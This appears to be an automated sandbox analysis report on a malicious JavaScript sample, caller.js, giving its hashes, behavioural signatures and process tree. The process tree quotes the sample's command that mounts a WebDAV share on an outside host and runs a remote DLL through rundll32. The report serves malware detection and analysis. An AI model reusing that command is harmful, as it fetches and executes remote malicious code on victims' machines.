Analysis
-
max time kernel
96s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
01-10-2024 18:57
Static task
static1
Behavioral task
behavioral1
Sample
caller.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
caller.js
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
caller.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
caller.js
Resource
win11-20240802-en
General
-
Target
caller.js
-
Size
1.5MB
-
MD5
93f6ba457cf4546708a88012d0407c6b
-
SHA1
14551a86622b82de8ab6cb3dc17d3583f5210a52
-
SHA256
d8b97079a169acd2113f436bef00a941f1f5d0746d90b0d8ed3f0312d754c18c
-
SHA512
af082054c95ddf920b763947e7cdb78859eb9ca3a0261996dd53b918836d84e5b544a68e1c186fbc36cbd12c238554ef5df352900ad5d80eea513ba1321341d0
-
SSDEEP
24576:0t2TNX+qdOp1w8K9hcxXwcUlINc6i8OmmdLBR92w0WqXJJ15XqcyTdiG0KtX:0t2TNX+qdOpjKzcxXMiNcqSpFS1BMioX
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: net.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 4540 timeout.exe -
Runs net.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3984 wrote to memory of 1044 3984 wscript.exe 83 PID 3984 wrote to memory of 1044 3984 wscript.exe 83 PID 3984 wrote to memory of 4452 3984 wscript.exe 85 PID 3984 wrote to memory of 4452 3984 wscript.exe 85 PID 1044 wrote to memory of 1928 1044 cmd.exe 87 PID 1044 wrote to memory of 1928 1044 cmd.exe 87 PID 4452 wrote to memory of 4540 4452 cmd.exe 88 PID 4452 wrote to memory of 4540 4452 cmd.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\caller.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c net use W: \\5n.si@ssl\tx && C:\Windows\syswow64\rundll32 w:\f\o.dll,%random%%random%2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\system32\net.exenet use W: \\5n.si@ssl\tx3⤵
- Enumerates connected drives
PID:1928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 180 && net use W: /d /y2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\timeout.exetimeout 1803⤵
- Delays execution with timeout.exe
PID:4540
-
-